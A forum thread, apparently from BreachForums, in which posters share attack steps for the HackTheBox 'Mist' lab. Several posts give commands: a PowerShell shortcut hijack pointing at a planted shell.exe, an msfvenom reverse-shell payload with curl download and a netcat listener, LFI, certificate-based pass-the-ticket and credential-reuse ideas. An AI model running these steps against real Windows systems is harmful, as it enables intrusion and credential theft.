Mar 31, 2024, 01:23 PM
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
SeCreateGlobalPrivilege
SeIncreaseWorkingSetPrivilege
|
HTB - Mist
by ghostess256 - Friday March 29, 2024 at 10:25 PM
|
|
Mar 31, 2024, 01:23 PM
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege SeIncreaseWorkingSetPrivilege
Mar 31, 2024, 01:29 PM
(Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon: how did you do it if we don't have permissions to access the "C:\Users\Brandon.Keywarp\AppData\links"
Mar 31, 2024, 01:38 PM
(Mar 31, 2024, 01:29 PM)FiatPandaGTRacingKit Wrote:you dont need brandon(Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon:
Mar 31, 2024, 04:12 PM
Ok time to move everyone along so we get some more eyes on this to find next steps...
Get shell as Brandon on ms01: $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("c:\Common Applications\Calculator.lnk") $lnk.TargetPath = "c:\xampp\htdocs\shell.exe" $lnk.Save() and wait a few min... Brandon dirs on MS01 seem boring. Nothing in winpeas either. And he can only see SYSVOL on DC01 via smb. Brandon can access certificate services (certify, certipy). You can req a certificate for user authentication, and use it to get the ntlm pair for Brandon to PTT. No vulnerable certs though according to the tools. Brandon can also dump AD via ldap. Bloodhound shows the members of Operatives group (op_ users) inherit membership to Remote Management Users, so can probably get a shell on DC01. Sharon_Mullard has logged into MS01 in the past, her creds might be stored if we can root MS01. the account op_Sharon_Mullard might share a password or hash with Sharon_Mullard and can probably pop a shell. I'm thinking this is the path forward... Anyone find anything else interesting? I'm sure there is some clue were all missing...
Mar 31, 2024, 04:15 PM
(Mar 31, 2024, 04:12 PM)xxxbfacc Wrote: Ok time to move everyone along so we get some more eyes on this to find next steps... I'm guessing that is a way forward, LSA process seems to be unprotected... 'just' get root on the MS01 box...
Mar 31, 2024, 04:25 PM
(This post was last modified: Mar 31, 2024, 05:22 PM by defxsec.
Edit Reason: error
)
Alguien me puede guiar como obtener una concha para Brandon
Para poder escalar al usuario Brandon: Primero debemos crear un shell.exe con msfvenom:imsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.16 LPORT=5555 -a x64 -f exe -o shell.exe luego subir el archivo shell.exe en la ruta c:\xampp\htdocs para eso crear un servidor http y con curl subirlo: python3 -m http.servidor 8000 curl -o shell.exe http://10.10.16.16:8000/shell.exe Ahora ejecutamos los siguientes comandos en un powershell si tiene un cmd cambiar a powershell: $objShell = Nuevo-Objeto -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("c:\Aplicaciones comunes\Calculator.lnk") $lnk.TargetPath = "c:\xampp\htdocs\shell.exe" $lnk.Guardar() Esperar unos minutos mientras nos ponemos en escucha Carolina del Norte-lvnp 5555 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: English Only Forum| https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.
Mar 31, 2024, 05:22 PM
we can mount ADMIN$, i dont know if it can help us, maybe this port forwading is just a rabbit hole
Mar 31, 2024, 07:06 PM
(Mar 31, 2024, 06:43 PM)3kyy Wrote:(Mar 31, 2024, 06:24 AM)LkStr Wrote:(Mar 30, 2024, 09:34 PM)bingle Wrote: got foothold earlier, to do so it's not that hard : There is a LFI for version 4.7 that lists this endpoint. Checking its source code on GitHub you can see where it looks for files (images) to be included (../../settings/modules/albums/) and directory listing is enabled there -> http://mist.htb/data/settings/modules/albums/ This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching. (Mar 31, 2024, 04:25 PM)defxsec Wrote: Alguien me puede guiar como obtener una concha para Brandon im confused, you upload the shell.exe with curl to the pluck machine? (Mar 31, 2024, 04:25 PM)defxsec Wrote: Alguien me puede guiar como obtener una concha para Brandon im confused, you upload the shell.exe with curl to the pluck machine? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Mar 31, 2024, 08:32 PM
Got Brandon Shell but idk what to do next
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] CPTS 12 FLAGS | 68 | 1,927 |
5 hours ago Last Post: VictorPipeau |
||
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 601 | 91,528 |
5 hours ago Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,796 |
6 hours ago Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,610 |
10 hours ago Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,268 |
Yesterday, 02:10 PM Last Post: kkkato |
||